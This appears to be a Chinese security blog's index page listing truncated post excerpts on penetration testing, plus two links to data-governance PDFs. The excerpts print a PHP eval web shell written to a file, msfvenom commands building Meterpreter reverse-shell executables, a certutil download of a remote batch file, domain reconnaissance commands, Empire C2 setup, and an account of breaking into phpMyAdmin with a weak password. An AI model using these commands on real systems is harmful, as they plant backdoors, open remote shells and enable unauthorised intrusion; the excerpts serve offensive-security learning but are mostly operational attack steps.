摘要:
数据安全治理能力评估方法.pdf: 链接: https://pan.baidu.com/s/14FYFAECcjn2rysKe7xTZgQ 提取码: ddci 复制这段内容后打开百度网盘手机App,操作更方便哦 数据安全治理实践指南.pdf: 链接: https://pan.baidu.com/s/ 阅读全文
摘要:
Windows: echo ^<?php @eval($_POST[cmd]);?^> > ./1.php Linux echo "<?php @eval(\$_POST['cmd']); ?>" > ./1.php 阅读全文
摘要:
信息收集 query user || qwinsta 查看当前在线用户 net user 查看本机用户 net user /domain 查看域用户 net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多 net view 阅读全文
摘要:
windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=攻击端口 -a x86 --platform Windows -f exe > okc.exe msfvenom -p windows/x64/meterpre 阅读全文
摘要:
Windows命令行读取写删下载文件命令 读取文件 type qq.txt 下载远端文件 certutil -urlcache -split -f http://XXXXX/test.bat 查找文件 for /r D:\ %i in (*2020*) do @echo %i #在D盘查找命名中带有 阅读全文
摘要:
转发:https://blog.csdn.net/u014199860/article/details/80415519 Windows下端口转发,以实现远程端口3389为例场景如下先说明一下场景,服务器A处于局域网环境内,IP为192.168.1.200(同时作为虚拟机B的网关192.168.13 阅读全文
摘要:
pip install dropbox2 或者: wgte https://files.pythonhosted.org/packages/88/c9/899c5d112eb4aa48fb611153c2f2eadafd859cbdee637b376d140a60e50d/dropbox-9.4.0 阅读全文
摘要:
安装使用: Empire运行在linux平台上,使用的系统是Centos,首先使用git命令把程序目录下载下来,如下图所示。 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装empire,命令如下: cd Emp 阅读全文
摘要:
首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了 尝试使用Navicate进行数据库连接返回禁止远程连接数据库: 但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接: Navicat安装目录下上传ntunnel_mysql.p 阅读全文
摘要:
漏洞简介 2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(Critical Patch Update),更新中修复了一个高危的 WebLogic 反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的 WebLogic 组件进行远程攻击,并 阅读全文